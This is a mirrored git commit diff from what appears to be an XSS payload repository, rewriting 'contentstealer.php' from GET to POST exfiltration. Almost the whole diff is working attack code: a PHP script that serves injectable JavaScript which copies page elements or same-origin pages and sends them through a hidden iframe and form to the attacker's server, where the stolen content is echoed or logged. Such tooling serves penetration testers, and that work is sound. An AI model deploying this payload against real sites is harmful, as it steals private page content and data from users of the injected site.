mirror of
https://github.com/nettitude/xss_payloads.git
synced 2024-11-21 19:53:05 +00:00
Re-wrote contentstealer.php to use POST and async XHRs
This commit is contained in:
parent
2d31072193
commit
9274c0f670
1 changed files with 70 additions and 24 deletions
|
@ -1,33 +1,79 @@
|
||||||
<?php
|
<?php
|
||||||
/*
|
/*
|
||||||
Host on a server under your control in order to include as a javascript and have either the current page or a page of your choosing sent back via a GET
|
Host on a server under your control in order to include as a javascript and have either the current page or a page of your choosing sent back via a POST
|
||||||
|
URL arguments to script:
|
||||||
|
- (Default) tag = element tag name to grab from current page. Default = "body"
|
||||||
|
- id = id of element to be grabbed from injected page
|
||||||
|
- url = url of page to retrieve (within the same origin as the page this script is injected into)
|
||||||
|
|
||||||
*/
|
*/
|
||||||
header( "Content-type: text/javascript" );
|
header( "Content-type: text/javascript" );
|
||||||
$url = "http://".$_SERVER["SERVER_ADDR"].$_SERVER["PHP_SELF"];
|
$url = "http://".$_SERVER["SERVER_ADDR"].$_SERVER["PHP_SELF"];
|
||||||
echo "// $url\n";
|
if( !isset( $_POST["c"] ) ){
|
||||||
if( !isset( $_GET["c"] ) ){
|
echo " function xssgetcontent(){\n";
|
||||||
echo "/*\n Inject with:\n ".$url."?id=userDiv or ".$url."?tag=ul\n";
|
|
||||||
echo " Where:\n"
|
// Get a URL
|
||||||
." id is the id of an element to be grabbed\n"
|
|
||||||
." tag is the name of all tags to be grabbed.\n"
|
|
||||||
." url is a URL within the same origin to download and return\n"
|
|
||||||
."Defaults to tag=body\n*/\n\n";
|
|
||||||
if( !empty( $_GET["url"] ) ){
|
if( !empty( $_GET["url"] ) ){
|
||||||
echo "function g(u){ x=new XMLHttpRequest(); x.open('GET',u,false); x.send(null); return x.responseText; }\n"
|
?>
|
||||||
."var content = g('".$_GET["url"]."');\n";
|
x=new XMLHttpRequest();
|
||||||
}elseif( !empty( $_GET["id"] ) ){
|
x.onreadystatechange = function(){
|
||||||
echo "var content = document.getElementById('".$_GET["id"]."').outerHTML;\n";
|
if( this.readyState == this.DONE ){
|
||||||
|
xsssendcontent(this.responseText);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
x.open('GET','<?php echo $_GET["url"]; ?>' );
|
||||||
|
x.send(null)
|
||||||
|
<?php
|
||||||
|
|
||||||
|
// Get an element by its id
|
||||||
|
}elseif( !empty( $_GET["id"] ) ){
|
||||||
|
?>
|
||||||
|
xsssendcontent(document.getElementById('<?php echo $_GET["id"]; ?>').outerHTML);
|
||||||
|
<?php
|
||||||
|
|
||||||
|
// Get elements by tag
|
||||||
}else{
|
}else{
|
||||||
if( empty( $_GET["tag"] ) ) $_GET["tag"] = "body";
|
if( empty( $_GET["tag"] ) ) $_GET["tag"] = "body";
|
||||||
echo "var content = '';\n";
|
|
||||||
echo "var col = document.getElementsByTagName('".$_GET["tag"]."');\n";
|
|
||||||
echo "for( var i=0; i<col.length; i++ ){ content += col[i].outerHTML + '\\n'; }\n";
|
|
||||||
}
|
|
||||||
?>
|
?>
|
||||||
var url = "<?php echo $url; ?>?c=" + encodeURIComponent(btoa(content));
|
var content = '';
|
||||||
f = document.createElement('iframe');
|
var col = document.getElementsByTagName('<?php echo $_GET["tag"]; ?>');
|
||||||
f.src = url;
|
for( var i=0; i<col.length; i++ ){
|
||||||
document.getElementsByTagName('body')[0].appendChild(f);
|
content += col[i].outerHTML + "\n\n";
|
||||||
<?php }else{
|
}
|
||||||
echo "/*\n".base64_decode( $_GET["c"] )."\n*/\n";
|
xsssendcontent(content);
|
||||||
}?>
|
<?php } ?>
|
||||||
|
}
|
||||||
|
|
||||||
|
function xsssendcontent(content){
|
||||||
|
document.getElementById('xss_content').value = content;
|
||||||
|
document.getElementById('form_xss').submit();
|
||||||
|
}
|
||||||
|
if( !document.getElementById('frame_xss') ){
|
||||||
|
frame = document.createElement('iframe');
|
||||||
|
frame.style='visibility: hidden;';
|
||||||
|
frame.name='frame_xss';
|
||||||
|
form = document.createElement('form');
|
||||||
|
form.action = '<?php echo $url; ?>'
|
||||||
|
form.target = 'frame_xss';
|
||||||
|
form.method='POST';
|
||||||
|
form.id = 'form_xss';
|
||||||
|
e = document.createElement('input');
|
||||||
|
e.type = 'hidden';
|
||||||
|
e.name = 'c';
|
||||||
|
e.id = 'xss_content';
|
||||||
|
form.appendChild(e);
|
||||||
|
document.getElementsByTagName('body')[0].appendChild(frame);
|
||||||
|
document.getElementsByTagName('body')[0].appendChild(form);
|
||||||
|
}
|
||||||
|
xssgetcontent();
|
||||||
|
<?php
|
||||||
|
}else{
|
||||||
|
|
||||||
|
// Reflect back the content that was stolen. Equally you could dump it to file / database at this point
|
||||||
|
echo $_POST["c"];
|
||||||
|
|
||||||
|
// Example basic logging to a file
|
||||||
|
// file_put_contents( 'contentstealer.log', $_POST["c"]."\n\n", FILE_APPEND );
|
||||||
|
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
Loading…
Reference in a new issue